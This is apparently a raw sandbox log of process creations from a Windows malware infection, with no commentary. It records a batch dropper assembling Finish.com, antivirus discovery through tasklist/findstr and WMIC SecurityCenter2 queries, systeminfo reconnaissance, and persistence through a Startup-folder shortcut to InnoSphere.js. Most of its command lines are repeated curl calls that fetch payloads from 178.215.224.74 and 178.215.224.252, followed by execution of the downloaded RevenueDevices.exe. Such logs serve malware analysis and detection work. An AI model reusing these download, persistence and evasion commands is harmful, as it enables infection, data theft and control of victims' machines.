Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Seek Seek.cmd & Seek.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fxhyo" "178.215.224.74/v10/ukyh.php?gi"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\fxhyo" "178.215.224.74/v10/ukyh.php?gi"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\jocox" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\jocox" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\curl.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\curl.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\curl.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\systeminfo.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\curl.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\curl.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\curl.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\systeminfo.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Feeling Feeling.cmd && Feeling.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 768032
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Howard + ..\Los + ..\Become + ..\Mental + ..\Vermont + ..\Bt + ..\Vatican G
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\768032\Finish.com Finish.com G
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoSphere.url" & echo URL="C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoSphere.url" & exit
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName > C:\Users\user\AppData\Local\temp\407 2>&1
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C type C:\Users\user\AppData\Local\temp\407 > C:\Users\user\AppData\Local\temp\403
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\tewjy" "178.215.224.252/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\sihmk" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\ekcal" "178.215.224.74/v10/ukyh.php?jspo=5"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\vuevs" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fsqyf" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\dmgfe" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\woejq" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\xvway" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\tlbry" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\tewjy" "178.215.224.252/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\sirxu" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\gtnez" "178.215.224.74/v10/ukyh.php?jspo=31"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C systeminfo | findstr /C:"OS Name" > C:\Users\user\AppData\Roaming\DolphinDumps\jvx 2>&1
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\gfdap" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\gjmcf" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\lkufr" "178.215.224.74/v10/ukyh.php?jspo=7"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\slpug" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\sihmk" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\qhiwq" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\ypalg" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\cbmaa" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe "C:\Users\user\AppData\Local\temp\RevenueDevices.exe"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\hzpaz" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fxhyo" "178.215.224.74/v10/ukyh.php?gi"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\jocox" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\ekcal" "178.215.224.74/v10/ukyh.php?jspo=5"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\cbmaa" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\slpug" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\tewjy" "178.215.224.252/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fxhyo" "178.215.224.74/v10/ukyh.php?gi"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\tewjy" "178.215.224.252/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\ekcal" "178.215.224.74/v10/ukyh.php?jspo=5"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\ypalg" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr "C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr" "C:\Users\user\AppData\Local\InnoSphere Dynamics\l"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\tewjy" "178.215.224.252/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\sihmk" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\ekcal" "178.215.224.74/v10/ukyh.php?jspo=5"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\vuevs" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\fsqyf" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\dmgfe" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\woejq" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\xvway" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\tlbry" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe azvw.exe -o xhwq.zip
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\sirxu" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\gtnez" "178.215.224.74/v10/ukyh.php?jspo=31"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /C:"OS Name"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\gfdap" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\gjmcf" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\lkufr" "178.215.224.74/v10/ukyh.php?jspo=7"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\slpug" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\ixhzf" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1"
